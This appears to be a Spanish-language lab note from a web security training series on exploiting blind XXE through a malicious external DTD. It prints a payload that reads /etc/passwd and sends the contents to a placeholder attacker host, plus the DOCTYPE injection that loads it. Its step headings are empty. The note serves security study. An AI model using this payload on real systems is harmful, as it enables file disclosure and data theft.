🌋Laboratorio: Exploiting blind XXE to exfiltrate data using a malicious external DTD
----------- CARGA UTIL
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
----------- NOMBRE ENDPOINT DE MI SERVER MALICIOSO
http://web-attacker.com/prueba.dtd
----------- LO QUE AÑADIMOS EN EL XML CON EL DTD:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://web-attacker.com/malicious.dtd"> %xxe;]>

Punto clave para la resolución de este lab:

Paso 1:

Paso 2:

Paso 3:






PreviousLaboratorio: Blind XXE with out-of-band interaction via XML parameter entitiesNextLaboratorio: Exploiting blind XXE to retrieve data via error messages
Last updated